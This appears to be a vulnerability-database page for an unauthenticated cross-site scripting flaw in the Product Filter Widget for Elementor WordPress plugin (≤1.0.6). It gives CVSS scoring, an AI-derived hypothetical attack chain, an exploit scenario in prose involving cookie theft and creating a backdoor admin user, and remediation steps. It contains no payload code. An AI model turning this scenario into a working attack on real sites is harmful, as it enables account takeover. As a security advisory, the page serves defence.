Skip to main content

Product Filter Widget for Elementor CVE-2026-45437

| EUVD-2026-36840 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-06-15 Patchstack GHSA-74gf-g3qr-4w7c
XSS Product Filter Widget For Elementor Elementor
7.1
CVSS 3.1 · Vendor: Patchstack
Share

Severity by source

Vendor (Patchstack) PRIMARY
7.1 HIGH
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
vuln.today AI
7.1 HIGH

Network-delivered reflected XSS requires victim click (UI:R) and no auth (PR:N); scope changes to victim browser context with limited C/I/A impact typical of XSS.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Patchstack).

CVSS VectorVendor: Patchstack

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

1
Analysis Generated
Jun 15, 2026 - 21:54 vuln.today

DescriptionCVE.org

Unauthenticated Cross Site Scripting (XSS) in Product Filter Widget for Elementor <= 1.0.6 versions.

AnalysisAI

Reflected/stored cross-site scripting in the Product Filter Widget for Elementor WordPress plugin (versions <= 1.0.6) allows unauthenticated remote attackers to inject malicious script that executes in a victim's browser after user interaction. The flaw was disclosed via Patchstack and carries a CVSS 3.1 score of 7.1 with scope change due to script execution in the browser context; no public exploit identified at time of analysis and the vulnerability is not listed in CISA KEV.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Identify WordPress site running vulnerable plugin
Delivery
Craft URL with XSS payload in filter parameter
Exploit
Deliver link via phishing or social engineering
Install
Victim clicks link in authenticated browser
C2
Payload executes in site origin
Execute
Exfiltrate cookies or invoke admin REST API
Impact
Persist via new admin user or backdoored theme
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires the target WordPress site to have the Product Filter Widget for Elementor plugin installed at version 1.0.6 or earlier and active on a publicly reachable page, plus victim user interaction (UI:R) - typically clicking an attacker-supplied link to a crafted filter URL or visiting an attacker-controlled page that triggers the injection. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L scores 7.1 (High), driven primarily by the scope change (S:C) reflecting that XSS executes in a different security context (the victim's authenticated browser session) rather than the raw impact severity. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a URL targeting a vulnerable storefront's filter endpoint with a malicious JavaScript payload embedded in a filter parameter, then distributes the link via phishing email, social media, or a comment on a forum frequented by site administrators. When a logged-in admin or shopper clicks the link, the script executes in their browser under the site's origin, allowing the attacker to steal session cookies, perform actions as the admin (e.g., create a backdoor user via the WordPress REST API), or redirect victims to a credential-harvesting page. …
Remediation Upstream fix available per Patchstack advisory; released patched version not independently confirmed from the provided data, so administrators should upgrade Product Filter Widget for Elementor to the latest version above 1.0.6 as published on the WordPress.org plugin repository and consult the Patchstack advisory at https://patchstack.com/database/wordpress/plugin/product-filter-widget-for-elementor/vulnerability/wordpress-product-filter-widget-for-elementor-plugin-1-0-6-cross-site-scripting-xss-vulnerability for the exact fixed release. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Identify all WordPress sites running Product Filter Widget for Elementor versions ≤ 1.0.6; disable the plugin immediately as interim mitigation; deploy Web Application Firewall rules blocking XSS payloads in filter parameters. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-45437 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy